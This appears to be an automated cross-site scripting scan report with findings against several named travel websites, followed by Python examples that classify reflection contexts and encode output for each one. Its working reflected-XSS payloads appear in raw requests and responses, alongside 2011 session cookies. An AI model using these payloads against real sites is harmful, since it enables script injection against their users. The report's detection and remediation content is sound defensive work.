The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda4a"><script>alert(1)</script>316ba34c109 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. It is the same sink as in 1.115 (the hidden last_name input in the error template echoes the full request path), reached here through the second path segment; attribute-encoding the path before it is written into the value attribute fixes both entries.

Request

GET /no/package_tourscda4a"><script>alert(1)</script>316ba34c109 HTTP/1.1
Host: www.reisefeber.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 13:49:28 GMT
Server: tn6 Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27017

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- template = error/page_has_expired.html -->
<html>
<head>
<title>Reisefeber - Gode reisetilbud er ferskvare</title>
<META http-e
...[SNIP]...
<input type="hidden" name="last_name" value="/no/package_tourscda4a"><script>alert(1)</script>316ba34c109">
...[SNIP]...
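
The issue-detail paragraphs in this report describe what the scanner actually checks: a unique probe is submitted, the response is searched for it, and the markup immediately before the echo decides the context (a double-quoted attribute value in 1.115 and 1.116; the entries that follow show text between tags, an HTML comment and a single-quoted JavaScript string). The following Python is an added example, not part of the XSS.CX report or of any scanner product; it reproduces that classification over constructed response fragments modelled on the entries in this section. The SAMPLES dictionary, the Reflection type and all function names are the example's own, and the "encoded sink" entry is hypothetical, included to show the non-exploitable case.

```python
import html
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote


@dataclass(frozen=True)
class Reflection:
    form: str      # "unmodified" or "html-encoded"
    context: str   # where in the document the echo landed
    offset: int    # index of the echo in the response body


def classify_context(body: str, idx: int) -> str:
    """Name the HTML/JS context at position idx using only the text before it.
    Checks run from the most enclosing construct outwards."""
    before = body[:idx]
    lower = before.lower()

    # HTML comment: the last '<!--' was opened after the last '-->'.
    if before.rfind("<!--") > before.rfind("-->"):
        return "HTML comment"

    # <script> block: an odd number of unescaped quotes since the block opened
    # means the echo sits inside a string literal of that quote kind.
    start = lower.rfind("<script")
    if start > lower.rfind("</script"):
        code = before[before.find(">", start) + 1:]
        code = re.sub(r"\\.", "", code)          # drop backslash-escaped chars
        if code.count("'") % 2 == 1:
            return "JavaScript string (single-quoted)"
        if code.count('"') % 2 == 1:
            return "JavaScript string (double-quoted)"
        return "JavaScript code"

    # Inside a tag: the last '<' was opened after the last '>'.  An odd number
    # of quotes since the tag opened means we are inside an attribute value.
    if before.rfind("<") > before.rfind(">"):
        tag = before[before.rfind("<"):]
        if tag.count('"') % 2 == 1:
            return "HTML attribute value (double-quoted)"
        if tag.count("'") % 2 == 1:
            return "HTML attribute value (single-quoted)"
        return "inside a tag (unquoted)"

    return "text between tags"


def find_reflection(body: str, submitted: str) -> Optional[Reflection]:
    """Search the response for the submitted probe.  The server sees the
    URL-decoded value, so compare against that (1.117 submits %20 and %3d but
    is echoed with spaces and '=').  A verbatim hit is the report's 'echoed
    unmodified' case; an entity-encoded hit means the sink encodes its output
    and the probe, as written, does not break out."""
    probe = unquote(submitted)
    idx = body.find(probe)
    if idx >= 0:
        return Reflection("unmodified", classify_context(body, idx), idx)
    idx = body.find(html.escape(probe, quote=True))
    if idx >= 0:
        return Reflection("html-encoded", classify_context(body, idx), idx)
    return None


# Constructed (probe, body) pairs modelled on the entries in this section.
SAMPLES = {
    "1.115 attribute": (
        '8e9b1"><script>alert(1)</script>01edd94456d',
        '<html><head><title>Reisefeber</title></head><body>\n'
        '<input type="hidden" name="last_name" value="/no8e9b1"><script>'
        'alert(1)</script>01edd94456d/package_tours">\n</body></html>'),
    "1.117 text": (
        'b57ab<img%20src%3da%20onerror%3dalert(1)>312e3bb0904',
        '<html><body>\n<p>Packagesb57ab<img src=a onerror=alert(1)>312e3bb0904'
        ' travel deals handpicked for you</p>\n</body></html>'),
    "1.118 comment": (
        'aebba--><script>alert(1)</script>56a708050fc',
        '<html>\n<!--\nService = TRAVELOCITY\nTYRG1ST = 333E8418B772166Caebba-->'
        '<script>alert(1)</script>56a708050fc\n-->\n<head></head></html>'),
    "1.119 js string": (
        "714e0'-alert(1)-'0522951330f",
        '<html><head><script type="text/javascript">\n'
        "custom_var='0|0|0|en_US|00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65714e0'"
        "-alert(1)-'0522951330f';\n_ht='http://www.aa.com/index.jsp/US';\n"
        '</script></head></html>'),
    "encoded sink": (   # hypothetical: what a correctly encoding sink returns
        '8e9b1"><script>alert(1)</script>01edd94456d',
        '<input value="/no8e9b1&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;'
        '01edd94456d/package_tours">'),
}


def scan_samples() -> dict:
    """Classify every constructed sample; returns name -> Reflection or None."""
    return {name: find_reflection(body, probe)
            for name, (probe, body) in SAMPLES.items()}
```

Running scan_samples() labels the first four samples "unmodified" with the same contexts the report states, and the hypothetical encoded sink "html-encoded"; a real scanner would treat only the former as a finding. The quote-parity heuristic is deliberately simple and will misjudge unusual markup (for example a stray quote inside an earlier attribute), which is why a scanner confirms the context with a second, context-specific probe before reporting.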

1.117. http://www.travel-ticker.com/category.jsp [categoryName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /category.jsp

Issue detail

The value of the categoryName request parameter is copied into the HTML document as plain text between tags. The payload b57ab<img%20src%3da%20onerror%3dalert(1)>312e3bb0904 was submitted in the categoryName parameter. This input was echoed as b57ab<img src=a onerror=alert(1)>312e3bb0904 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /category.jsp?actionType=1&categoryType=Type&categoryName=Packagesb57ab<img%20src%3da%20onerror%3dalert(1)>312e3bb0904&sid=S287&bid=B312628 HTTP/1.1
Host: www.travel-ticker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DC9547F3C6C155664A59384025CFE96A; Path=/
Set-Cookie: SaneID=DC9547F3C6C155664A59384025CFE96; Expires=Mon, 17-Oct-2016 13:48:43 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: hotwireLogin=...[SNIP]...; Expires=Mon, 12-Nov-2012 13:48:43 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sun, 13 Nov 2011 13:48:42 GMT
Set-Cookie: NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c7945525d5f4f58455e445a4a422d51;path=/;httponly
Content-Length: 353976

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favicon.ico?ver=2076
...[SNIP]...
<p>Packagesb57ab<img src=a onerror=alert(1)>312e3bb0904 travel deals handpicked for you</p>
...[SNIP]...

1.118. http://travel.travelocity.com/trips/SelectHotel.do [tyrg1st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /trips/SelectHotel.do

Issue detail

The value of the tyrg1st cookie is copied into an HTML comment. The payload aebba--><script>alert(1)</script>56a708050fc was submitted in the tyrg1st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, for instance a separate script-injection flaw on another host in the same parent domain, or a response-header injection that lets an attacker add a Set-Cookie header. This limitation considerably mitigates the impact of the vulnerability, which is why it is rated Information rather than High.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment (with -->, or --!> under HTML5 parsing rules) or use other techniques to introduce scripts within the comment context. Entity encoding does not help here, because entities are not decoded inside comments; the data should not be written into a comment at all.

Request

GET /trips/SelectHotel.do;jsessionid=6BCDBF9222795F098DDE19F1029B74A0.p0618?travelPackageId=-969765922&SEQ=132119068635410132011&sessionResponseType=hotelShopResponse HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/trips/ViewHotelDetail.do;jsessionid=6BCDBF9222795F098DDE19F1029B74A0.p0618?SEQ=&propertyId=103814&travelPackageId=-969765922&tab=ttrooms&updateSuitcase=false&loclink=VAC_SELECTHOTEL1%7CNAT1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=333E8418B772166Caebba--><script>alert(1)</script>56a708050fc; TUID=29a03bfd-dd1b-4415-9627-a1b0de2d2894; pcookie=n; mt.ti=%7B%22dest%22:%22MIA%22,%22tripDays%22:2%7D; drft=d61d21b6-f8ce-487e-8270-1a087fd74f65; SID=T0042004706111113072154205152534750467; Service=TRAVELOCITY; IPE910=IPE910; JSID=6BCDBF9222795F098DDE19F1029B74A0.p0618; fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; bvgacefAskAndAnswer=true; bvgacefStories=true; mbox=PC#1320962010545-896769.19#1322400373|session#1321190517139-98622#1321192633|check#true#1321190833; __utma=1.543267917.1320962024.1321051917.1321190526.3; __utmb=1.7.8.1321190709439; __utmc=1; __utmz=1.1321190526.3.3.utmcsr=bing.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel/; mt.v=1.1040137567.1320962024293; IPE_S_TMP_910=910

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:33:19 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 184984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/html">
<!--
JSESSIONID = 6BCDBF9222795F098DDE19F1029B74A0.p0618
TPSESSIONID = T0042004706111113072154205152534750467
Service = TRAVELOCITY
TYRG1ST = 333E8418B772166Caebba--><script>alert(1)</script>56a708050fc
-->
...[SNIP]...

1.119. https://www.aa.com/homePage.do [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aa.com
Path:   /homePage.do

Issue detail

The value of the JSESSIONID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 714e0'-alert(1)-'0522951330f was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two further points are visible in this exchange: the session identifier is written into the page's own script (the custom_var assignment), so any script running in the page can read it whether or not the cookie is marked HttpOnly, and the Set-Cookie header that reissues JSESSIONID in the response carries neither the Secure nor the HttpOnly attribute although the site is served over HTTPS.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it cannot be avoided, every non-alphanumeric character of the value must be escaped inside the JavaScript string (in \uXXXX form), including < and > so that a </script> sequence cannot end the block; HTML entity encoding is not applied inside script elements and does not help.

Request

GET /homePage.do HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.aa.com/reservation/enterPassengerDetailsSubmit.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65714e0'-alert(1)-'0522951330f; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 164422
Date: Sun, 13 Nov 2011 13:33:53 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0000V4y_Q0L-O-PnA6hLYbAOhdK:15lkmm2i0; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lan
...[SNIP]...
<script type="text/javascript">
   
   
                   custom_var='0|0|0|en_US|00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65714e0'-alert(1)-'0522951330f';
   
   
   _ht='http://www.aa.com/index.jsp/US';    
   </script>
...[SNIP]...
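
The remediation notes for 1.118 and 1.119, together with the attribute and text-node findings in 1.115 through 1.117, each call for a different output encoding. The following Python is an added example, not code from the report or from any of the sites it lists; it applies the encoder appropriate to each of the four contexts seen in this section to the report's own probe strings, and shows the preferred fix for the script-string case, which is to keep the value out of the script block entirely. The markup it rebuilds is modelled on the report's responses; the function names, the aa-ctx element id and the data-custom-var attribute are the example's own.

```python
import html
import re


def encode_for_html_text(value: str) -> str:
    """Text node between tags (1.117): entity-encode '&', '<' and '>'."""
    return html.escape(value, quote=False)


def encode_for_html_attribute(value: str) -> str:
    """Quoted attribute value (1.115, 1.116): additionally encode both quote
    characters so the value cannot terminate the attribute or the tag."""
    return html.escape(value, quote=True)


def encode_for_html_comment(value: str) -> str:
    """HTML comment (1.118).  Entities are not decoded inside comments, so
    encoding achieves nothing; the only terminators are '-->' and '--!>', so
    drop '-' and '>' outright.  Blunt, but the report's own advice is not to
    echo untrusted data into a comment at all."""
    return re.sub(r"[->]", "", value)


def encode_for_js_string(value: str) -> str:
    """Quoted JavaScript string literal (1.119).  Escape every ASCII character
    that is not alphanumeric as \\uXXXX; this covers both quote kinds, the
    backslash, '<' and '>' (so '</script>' cannot re-enter the HTML parser)
    and newlines.  U+2028/U+2029 are line terminators in JavaScript and are
    escaped too; other non-ASCII text cannot close a literal and passes
    through."""
    def esc(ch: str) -> str:
        o = ord(ch)
        if ch.isascii() and ch.isalnum():
            return ch
        if o < 0x80 or o in (0x2028, 0x2029):
            return "\\u%04x" % o
        return ch
    return "".join(esc(c) for c in value)


def render_without_script_context(value: str) -> str:
    """Preferred fix for 1.119: keep the value out of the script block.  Emit
    it as an attribute-encoded data-* attribute and have the page's script
    read document.getElementById('aa-ctx').dataset.customVar.  The element
    id and attribute name are this example's own, not the site's."""
    return ('<div id="aa-ctx" data-custom-var="%s"></div>'
            % encode_for_html_attribute(value))


# The probes this report submitted, one per context.
PAYLOADS = {
    "attribute": '8e9b1"><script>alert(1)</script>01edd94456d',
    "text":      'b57ab<img src=a onerror=alert(1)>312e3bb0904',
    "comment":   'aebba--><script>alert(1)</script>56a708050fc',
    "js_string": "714e0'-alert(1)-'0522951330f",
}


def render_hardened(values: dict) -> dict:
    """Rebuild the four reflected fragments from this section, each through
    the encoder for its context.  Markup is modelled on the report's
    responses."""
    return {
        "attribute": '<input type="hidden" name="last_name" value="%s">'
                     % encode_for_html_attribute(values["attribute"]),
        "text": "<p>%s travel deals handpicked for you</p>"
                % encode_for_html_text(values["text"]),
        "comment": "<!--\nTYRG1ST = %s\n-->"
                   % encode_for_html_comment(values["comment"]),
        "js_string": "<script>custom_var='0|0|0|en_US|%s';</script>"
                     % encode_for_js_string(values["js_string"]),
    }
```

With render_hardened(PAYLOADS), the attribute fragment keeps exactly its six template quotes, the text fragment contains no tag, the comment still has a single terminator at its end, and the script fragment has exactly the two quotes of its own literal. The encoders are chosen per sink; applying the attribute encoder to the script case, or vice versa, would leave one of the four probes intact.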
